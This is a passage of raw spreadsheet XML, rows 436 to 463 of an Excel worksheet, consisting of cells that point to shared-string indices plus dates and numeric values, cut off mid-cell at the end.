      <c r="E436" s="95" t="s">
        <v>1585</v>
      </c>
      <c r="F436" s="42">
        <v>200</v>
      </c>
      <c r="G436" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H436" t="s">
        <v>1588</v>
      </c>
      <c r="I436" t="s">
        <v>179</v>
      </c>
      <c r="J436" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K436" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L436" t="s">
        <v>77</v>
      </c>
      <c r="P436" t="s">
        <v>181</v>
      </c>
      <c r="Q436" s="95" t="s">
        <v>626</v>
      </c>
      <c r="W436" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="437" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A437" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B437" s="52"/>
      <c r="C437" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D437" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E437" s="95" t="s">
        <v>1585</v>
      </c>
      <c r="F437" s="42">
        <v>300</v>
      </c>
      <c r="G437" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H437" t="s">
        <v>1586</v>
      </c>
      <c r="I437" t="s">
        <v>179</v>
      </c>
      <c r="J437" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K437" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L437" t="s">
        <v>77</v>
      </c>
      <c r="P437" t="s">
        <v>181</v>
      </c>
      <c r="Q437" s="95" t="s">
        <v>1589</v>
      </c>
      <c r="W437" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="438" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A438" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B438" s="52">
        <v>44379.637047951386</v>
      </c>
      <c r="C438" s="95" t="s">
        <v>1590</v>
      </c>
      <c r="D438" s="96">
        <v>100</v>
      </c>
      <c r="E438" s="95" t="s">
        <v>1591</v>
      </c>
      <c r="F438" s="42">
        <v>100</v>
      </c>
      <c r="G438" s="95" t="s">
        <v>1592</v>
      </c>
      <c r="H438" t="s">
        <v>1593</v>
      </c>
      <c r="I438" t="s">
        <v>196</v>
      </c>
      <c r="J438" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K438" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L438" t="s">
        <v>77</v>
      </c>
      <c r="M438" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N438" t="s">
        <v>198</v>
      </c>
      <c r="Q438" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="R438">
        <v>2983</v>
      </c>
      <c r="S438">
        <v>2789</v>
      </c>
      <c r="T438">
        <v>2430</v>
      </c>
      <c r="U438">
        <v>2124</v>
      </c>
      <c r="V438">
        <v>2633</v>
      </c>
      <c r="W438" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="439" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A439" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B439" s="52"/>
      <c r="C439" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D439" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E439" s="95" t="s">
        <v>1594</v>
      </c>
      <c r="F439" s="42">
        <v>100</v>
      </c>
      <c r="G439" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H439" t="s">
        <v>1595</v>
      </c>
      <c r="I439" t="s">
        <v>196</v>
      </c>
      <c r="J439" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K439" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L439" t="s">
        <v>77</v>
      </c>
      <c r="M439" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N439" t="s">
        <v>198</v>
      </c>
      <c r="P439" t="s">
        <v>1596</v>
      </c>
      <c r="Q439" s="95" t="s">
        <v>1597</v>
      </c>
      <c r="W439" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="440" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A440" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B440" s="52"/>
      <c r="C440" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D440" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E440" s="95" t="s">
        <v>1594</v>
      </c>
      <c r="F440" s="42">
        <v>200</v>
      </c>
      <c r="G440" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H440" t="s">
        <v>1595</v>
      </c>
      <c r="I440" t="s">
        <v>196</v>
      </c>
      <c r="J440" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K440" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L440" t="s">
        <v>77</v>
      </c>
      <c r="M440" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N440" t="s">
        <v>198</v>
      </c>
      <c r="P440" t="s">
        <v>1596</v>
      </c>
      <c r="Q440" s="95" t="s">
        <v>1598</v>
      </c>
      <c r="W440" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="441" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A441" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B441" s="52">
        <v>44433.736928368053</v>
      </c>
      <c r="C441" s="95" t="s">
        <v>1599</v>
      </c>
      <c r="D441" s="96">
        <v>111</v>
      </c>
      <c r="E441" s="95" t="s">
        <v>1600</v>
      </c>
      <c r="F441" s="42">
        <v>100</v>
      </c>
      <c r="G441" s="95" t="s">
        <v>1601</v>
      </c>
      <c r="H441" t="s">
        <v>1602</v>
      </c>
      <c r="I441" t="s">
        <v>31</v>
      </c>
      <c r="J441" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K441" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L441" t="s">
        <v>77</v>
      </c>
      <c r="M441" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N441" t="s">
        <v>263</v>
      </c>
      <c r="Q441" s="95" t="s">
        <v>1603</v>
      </c>
      <c r="R441">
        <v>47853</v>
      </c>
      <c r="S441">
        <v>18156</v>
      </c>
      <c r="T441">
        <v>21457</v>
      </c>
      <c r="U441">
        <v>26856</v>
      </c>
      <c r="V441">
        <v>30200</v>
      </c>
      <c r="W441" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="442" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A442" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B442" s="52">
        <v>44519.632626631945</v>
      </c>
      <c r="C442" s="95" t="s">
        <v>1599</v>
      </c>
      <c r="D442" s="96">
        <v>201</v>
      </c>
      <c r="E442" s="95" t="s">
        <v>1600</v>
      </c>
      <c r="F442" s="42">
        <v>200</v>
      </c>
      <c r="G442" s="95" t="s">
        <v>1601</v>
      </c>
      <c r="H442" t="s">
        <v>1602</v>
      </c>
      <c r="I442" t="s">
        <v>31</v>
      </c>
      <c r="J442" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K442" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L442" t="s">
        <v>77</v>
      </c>
      <c r="M442" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N442" t="s">
        <v>263</v>
      </c>
      <c r="Q442" s="95" t="s">
        <v>1604</v>
      </c>
      <c r="R442">
        <v>47853</v>
      </c>
      <c r="S442">
        <v>18156</v>
      </c>
      <c r="T442">
        <v>21457</v>
      </c>
      <c r="U442">
        <v>26856</v>
      </c>
      <c r="V442">
        <v>30200</v>
      </c>
      <c r="W442" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="443" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A443" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B443" s="52"/>
      <c r="C443" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D443" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E443" s="95" t="s">
        <v>1605</v>
      </c>
      <c r="F443" s="42">
        <v>100</v>
      </c>
      <c r="G443" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H443" t="s">
        <v>1606</v>
      </c>
      <c r="I443" t="s">
        <v>75</v>
      </c>
      <c r="J443" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K443" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L443" t="s">
        <v>77</v>
      </c>
      <c r="P443" t="s">
        <v>577</v>
      </c>
      <c r="Q443" s="95" t="s">
        <v>1607</v>
      </c>
      <c r="W443" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="444" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A444" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B444" s="52"/>
      <c r="C444" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D444" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E444" s="95" t="s">
        <v>1608</v>
      </c>
      <c r="F444" s="42">
        <v>100</v>
      </c>
      <c r="G444" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H444" t="s">
        <v>1609</v>
      </c>
      <c r="I444" t="s">
        <v>75</v>
      </c>
      <c r="J444" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K444" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L444" t="s">
        <v>77</v>
      </c>
      <c r="M444" s="95" t="s">
        <v>650</v>
      </c>
      <c r="Q444" s="95" t="s">
        <v>1610</v>
      </c>
      <c r="W444" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="445" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A445" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B445" s="52">
        <v>44130.302816875002</v>
      </c>
      <c r="C445" s="95" t="s">
        <v>1611</v>
      </c>
      <c r="D445" s="96">
        <v>100</v>
      </c>
      <c r="E445" s="95" t="s">
        <v>1612</v>
      </c>
      <c r="F445" s="42">
        <v>100</v>
      </c>
      <c r="G445" s="95" t="s">
        <v>1613</v>
      </c>
      <c r="H445" t="s">
        <v>1614</v>
      </c>
      <c r="I445" t="s">
        <v>196</v>
      </c>
      <c r="J445" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K445" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L445" t="s">
        <v>77</v>
      </c>
      <c r="M445" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N445" t="s">
        <v>198</v>
      </c>
      <c r="Q445" s="95" t="s">
        <v>1615</v>
      </c>
      <c r="R445">
        <v>225</v>
      </c>
      <c r="S445">
        <v>1468</v>
      </c>
      <c r="T445">
        <v>283</v>
      </c>
      <c r="U445">
        <v>268</v>
      </c>
      <c r="V445">
        <v>268</v>
      </c>
      <c r="W445" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="446" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A446" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B446" s="52">
        <v>44130.302816863426</v>
      </c>
      <c r="C446" s="95" t="s">
        <v>1611</v>
      </c>
      <c r="D446" s="96">
        <v>100</v>
      </c>
      <c r="E446" s="95" t="s">
        <v>1616</v>
      </c>
      <c r="F446" s="42">
        <v>100</v>
      </c>
      <c r="G446" s="95" t="s">
        <v>1617</v>
      </c>
      <c r="H446" t="s">
        <v>1618</v>
      </c>
      <c r="I446" t="s">
        <v>196</v>
      </c>
      <c r="J446" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K446" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L446" t="s">
        <v>77</v>
      </c>
      <c r="M446" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N446" t="s">
        <v>198</v>
      </c>
      <c r="Q446" s="95" t="s">
        <v>1615</v>
      </c>
      <c r="U446">
        <v>6</v>
      </c>
      <c r="V446">
        <v>2</v>
      </c>
      <c r="W446" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="447" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A447" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B447" s="52">
        <v>43977.754807789352</v>
      </c>
      <c r="C447" s="95" t="s">
        <v>1619</v>
      </c>
      <c r="D447" s="96">
        <v>120</v>
      </c>
      <c r="E447" s="95" t="s">
        <v>1620</v>
      </c>
      <c r="F447" s="42">
        <v>101</v>
      </c>
      <c r="G447" s="95" t="s">
        <v>1621</v>
      </c>
      <c r="H447" t="s">
        <v>1622</v>
      </c>
      <c r="I447" t="s">
        <v>196</v>
      </c>
      <c r="J447" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K447" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L447" t="s">
        <v>77</v>
      </c>
      <c r="M447" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N447" t="s">
        <v>198</v>
      </c>
      <c r="O447" s="95" t="s">
        <v>1623</v>
      </c>
      <c r="P447" t="s">
        <v>242</v>
      </c>
      <c r="Q447" s="95" t="s">
        <v>1624</v>
      </c>
      <c r="R447">
        <v>47</v>
      </c>
      <c r="S447">
        <v>13</v>
      </c>
      <c r="T447">
        <v>152</v>
      </c>
      <c r="U447">
        <v>95</v>
      </c>
      <c r="V447">
        <v>181</v>
      </c>
      <c r="W447" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="448" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A448" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B448" s="52">
        <v>44357.832009259262</v>
      </c>
      <c r="C448" s="95" t="s">
        <v>1619</v>
      </c>
      <c r="D448" s="96">
        <v>120</v>
      </c>
      <c r="E448" s="95" t="s">
        <v>1625</v>
      </c>
      <c r="F448" s="42">
        <v>100</v>
      </c>
      <c r="G448" s="95" t="s">
        <v>1626</v>
      </c>
      <c r="H448" t="s">
        <v>1627</v>
      </c>
      <c r="I448" t="s">
        <v>196</v>
      </c>
      <c r="J448" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K448" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L448" t="s">
        <v>77</v>
      </c>
      <c r="M448" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N448" t="s">
        <v>198</v>
      </c>
      <c r="O448" s="95" t="s">
        <v>1628</v>
      </c>
      <c r="Q448" s="95" t="s">
        <v>1624</v>
      </c>
      <c r="W448" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="449" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A449" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B449" s="52">
        <v>44363.663383263891</v>
      </c>
      <c r="C449" s="95" t="s">
        <v>1629</v>
      </c>
      <c r="D449" s="96">
        <v>100</v>
      </c>
      <c r="E449" s="95" t="s">
        <v>1630</v>
      </c>
      <c r="F449" s="42">
        <v>100</v>
      </c>
      <c r="G449" s="95" t="s">
        <v>1631</v>
      </c>
      <c r="H449" t="s">
        <v>1632</v>
      </c>
      <c r="I449" t="s">
        <v>196</v>
      </c>
      <c r="J449" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K449" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L449" t="s">
        <v>77</v>
      </c>
      <c r="M449" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N449" t="s">
        <v>198</v>
      </c>
      <c r="Q449" s="95" t="s">
        <v>1633</v>
      </c>
      <c r="W449" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="450" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A450" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B450" s="52">
        <v>44363.663383298612</v>
      </c>
      <c r="C450" s="95" t="s">
        <v>1629</v>
      </c>
      <c r="D450" s="96">
        <v>100</v>
      </c>
      <c r="E450" s="95" t="s">
        <v>1634</v>
      </c>
      <c r="F450" s="42">
        <v>100</v>
      </c>
      <c r="G450" s="95" t="s">
        <v>1635</v>
      </c>
      <c r="H450" t="s">
        <v>1636</v>
      </c>
      <c r="I450" t="s">
        <v>196</v>
      </c>
      <c r="J450" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K450" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L450" t="s">
        <v>77</v>
      </c>
      <c r="M450" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N450" t="s">
        <v>198</v>
      </c>
      <c r="Q450" s="95" t="s">
        <v>1633</v>
      </c>
      <c r="R450">
        <v>7929</v>
      </c>
      <c r="S450">
        <v>5966</v>
      </c>
      <c r="T450">
        <v>6409</v>
      </c>
      <c r="U450">
        <v>8838</v>
      </c>
      <c r="V450">
        <v>7497</v>
      </c>
      <c r="W450" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="451" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A451" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B451" s="52"/>
      <c r="C451" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D451" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E451" s="95" t="s">
        <v>1637</v>
      </c>
      <c r="F451" s="42">
        <v>200</v>
      </c>
      <c r="G451" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H451" t="s">
        <v>1638</v>
      </c>
      <c r="I451" t="s">
        <v>103</v>
      </c>
      <c r="J451" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K451" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L451" t="s">
        <v>77</v>
      </c>
      <c r="M451" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P451" t="s">
        <v>772</v>
      </c>
      <c r="Q451" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W451" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="452" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A452" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B452" s="52"/>
      <c r="C452" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D452" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E452" s="95" t="s">
        <v>1639</v>
      </c>
      <c r="F452" s="42">
        <v>100</v>
      </c>
      <c r="G452" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H452" t="s">
        <v>1640</v>
      </c>
      <c r="I452" t="s">
        <v>103</v>
      </c>
      <c r="J452" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K452" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L452" t="s">
        <v>77</v>
      </c>
      <c r="M452" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P452" t="s">
        <v>772</v>
      </c>
      <c r="Q452" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W452" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="453" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A453" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B453" s="52">
        <v>44540.730685659721</v>
      </c>
      <c r="C453" s="95" t="s">
        <v>1641</v>
      </c>
      <c r="D453" s="96">
        <v>100</v>
      </c>
      <c r="E453" s="95" t="s">
        <v>1642</v>
      </c>
      <c r="F453" s="42">
        <v>100</v>
      </c>
      <c r="G453" s="95" t="s">
        <v>1643</v>
      </c>
      <c r="H453" t="s">
        <v>1644</v>
      </c>
      <c r="I453" t="s">
        <v>196</v>
      </c>
      <c r="J453" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K453" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L453" t="s">
        <v>77</v>
      </c>
      <c r="M453" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N453" t="s">
        <v>198</v>
      </c>
      <c r="O453" s="95" t="s">
        <v>1645</v>
      </c>
      <c r="Q453" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W453" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="454" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A454" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B454" s="52">
        <v>44525.49595715278</v>
      </c>
      <c r="C454" s="95" t="s">
        <v>1646</v>
      </c>
      <c r="D454" s="96">
        <v>100</v>
      </c>
      <c r="E454" s="95" t="s">
        <v>1647</v>
      </c>
      <c r="F454" s="42">
        <v>100</v>
      </c>
      <c r="G454" s="95" t="s">
        <v>1648</v>
      </c>
      <c r="H454" t="s">
        <v>1649</v>
      </c>
      <c r="I454" t="s">
        <v>31</v>
      </c>
      <c r="J454" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K454" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L454" t="s">
        <v>77</v>
      </c>
      <c r="M454" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N454" t="s">
        <v>263</v>
      </c>
      <c r="Q454" s="95" t="s">
        <v>1650</v>
      </c>
      <c r="R454">
        <v>91</v>
      </c>
      <c r="S454">
        <v>616</v>
      </c>
      <c r="T454">
        <v>3762</v>
      </c>
      <c r="U454">
        <v>3408</v>
      </c>
      <c r="V454">
        <v>5432</v>
      </c>
      <c r="W454" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="455" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A455" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B455" s="52">
        <v>44649.69528</v>
      </c>
      <c r="C455" s="95" t="s">
        <v>1647</v>
      </c>
      <c r="D455" s="96">
        <v>102</v>
      </c>
      <c r="E455" s="95" t="s">
        <v>1651</v>
      </c>
      <c r="F455" s="42">
        <v>102</v>
      </c>
      <c r="G455" s="95" t="s">
        <v>1652</v>
      </c>
      <c r="H455" t="s">
        <v>1653</v>
      </c>
      <c r="I455" t="s">
        <v>196</v>
      </c>
      <c r="J455" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K455" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L455" t="s">
        <v>77</v>
      </c>
      <c r="M455" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N455" t="s">
        <v>198</v>
      </c>
      <c r="Q455" s="95" t="s">
        <v>1654</v>
      </c>
      <c r="W455" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="456" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A456" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B456" s="52"/>
      <c r="C456" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D456" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E456" s="95" t="s">
        <v>1655</v>
      </c>
      <c r="F456" s="42">
        <v>100</v>
      </c>
      <c r="G456" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H456" t="s">
        <v>1656</v>
      </c>
      <c r="I456" t="s">
        <v>103</v>
      </c>
      <c r="J456" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K456" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L456" t="s">
        <v>77</v>
      </c>
      <c r="M456" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P456" t="s">
        <v>246</v>
      </c>
      <c r="Q456" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W456" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="457" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A457" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B457" s="52">
        <v>44326.923011990744</v>
      </c>
      <c r="C457" s="95" t="s">
        <v>1657</v>
      </c>
      <c r="D457" s="96">
        <v>102</v>
      </c>
      <c r="E457" s="95" t="s">
        <v>1658</v>
      </c>
      <c r="F457" s="42">
        <v>102</v>
      </c>
      <c r="G457" s="95" t="s">
        <v>1659</v>
      </c>
      <c r="H457" t="s">
        <v>1660</v>
      </c>
      <c r="I457" t="s">
        <v>185</v>
      </c>
      <c r="J457" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K457" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L457" t="s">
        <v>83</v>
      </c>
      <c r="M457" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O457" s="95" t="s">
        <v>1661</v>
      </c>
      <c r="Q457" s="95" t="s">
        <v>1662</v>
      </c>
      <c r="R457">
        <v>20110</v>
      </c>
      <c r="S457">
        <v>19820</v>
      </c>
      <c r="T457">
        <v>25748</v>
      </c>
      <c r="U457">
        <v>34210</v>
      </c>
      <c r="V457">
        <v>33832</v>
      </c>
      <c r="W457" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="458" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A458" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B458" s="52"/>
      <c r="C458" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D458" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E458" s="95" t="s">
        <v>1663</v>
      </c>
      <c r="F458" s="42">
        <v>200</v>
      </c>
      <c r="G458" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H458" t="s">
        <v>1664</v>
      </c>
      <c r="I458" t="s">
        <v>268</v>
      </c>
      <c r="J458" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K458" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L458" t="s">
        <v>77</v>
      </c>
      <c r="M458" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N458" t="s">
        <v>271</v>
      </c>
      <c r="P458" t="s">
        <v>272</v>
      </c>
      <c r="Q458" s="95" t="s">
        <v>1665</v>
      </c>
      <c r="W458" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="459" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A459" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B459" s="52"/>
      <c r="C459" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D459" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E459" s="95" t="s">
        <v>1663</v>
      </c>
      <c r="F459" s="42">
        <v>110</v>
      </c>
      <c r="G459" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H459" t="s">
        <v>1666</v>
      </c>
      <c r="I459" t="s">
        <v>268</v>
      </c>
      <c r="J459" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K459" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L459" t="s">
        <v>77</v>
      </c>
      <c r="M459" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N459" t="s">
        <v>271</v>
      </c>
      <c r="P459" t="s">
        <v>272</v>
      </c>
      <c r="Q459" s="95" t="s">
        <v>275</v>
      </c>
      <c r="W459" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="460" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A460" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B460" s="52"/>
      <c r="C460" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D460" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E460" s="95" t="s">
        <v>1663</v>
      </c>
      <c r="F460" s="42">
        <v>200</v>
      </c>
      <c r="G460" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H460" t="s">
        <v>1666</v>
      </c>
      <c r="I460" t="s">
        <v>268</v>
      </c>
      <c r="J460" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K460" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L460" t="s">
        <v>77</v>
      </c>
      <c r="M460" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N460" t="s">
        <v>271</v>
      </c>
      <c r="P460" t="s">
        <v>272</v>
      </c>
      <c r="Q460" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W460" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="461" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A461" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B461" s="52">
        <v>43714.759844074077</v>
      </c>
      <c r="C461" s="95" t="s">
        <v>1667</v>
      </c>
      <c r="D461" s="96">
        <v>100</v>
      </c>
      <c r="E461" s="95" t="s">
        <v>1668</v>
      </c>
      <c r="F461" s="42">
        <v>100</v>
      </c>
      <c r="G461" s="95" t="s">
        <v>1669</v>
      </c>
      <c r="H461" t="s">
        <v>1670</v>
      </c>
      <c r="I461" t="s">
        <v>31</v>
      </c>
      <c r="J461" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K461" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L461" t="s">
        <v>77</v>
      </c>
      <c r="M461" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N461" t="s">
        <v>263</v>
      </c>
      <c r="Q461" s="95" t="s">
        <v>1671</v>
      </c>
      <c r="W461" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="462" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A462" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B462" s="52">
        <v>44253.613336840281</v>
      </c>
      <c r="C462" s="95" t="s">
        <v>1667</v>
      </c>
      <c r="D462" s="96">
        <v>100</v>
      </c>
      <c r="E462" s="95" t="s">
        <v>1668</v>
      </c>
      <c r="F462" s="42">
        <v>100</v>
      </c>
      <c r="G462" s="95" t="s">
        <v>1672</v>
      </c>
      <c r="H462" t="s">
        <v>1670</v>
      </c>
      <c r="I462" t="s">
        <v>31</v>
      </c>
      <c r="J462" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K462" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L462" t="s">
        <v>77</v>
      </c>
      <c r="M462" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N462" t="s">
        <v>263</v>
      </c>
      <c r="Q462" s="95" t="s">
        <v>1673</v>
      </c>
      <c r="R462">
        <v>45</v>
      </c>
      <c r="S462">
        <v>30</v>
      </c>
      <c r="T462">
        <v>52</v>
      </c>
      <c r="U462">
        <v>33</v>
      </c>
      <c r="V462">
        <v>28</v>
      </c>
      <c r="W462" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="463" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A463" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B463" s="52">
        <v>44320.663404872685</v>
      </c>
      <c r="C463" s="95" t="s">
        <v>1674</v>
      </c>
      <c r="D463" s="96">
        <v>103</v>
      </c>
      <c r="E463" s="95" t="s">
        <v>1675</v>
      </c>
      <c r="F463" s="42">
        <v>103</v>
      </c>
      <c r="G463" s="95" t="s">
        <v>1676</v>
      </c>
      <c r="H463" t="s">
        <v>1677</v>
      </c>
      <c r="I463" t="s">
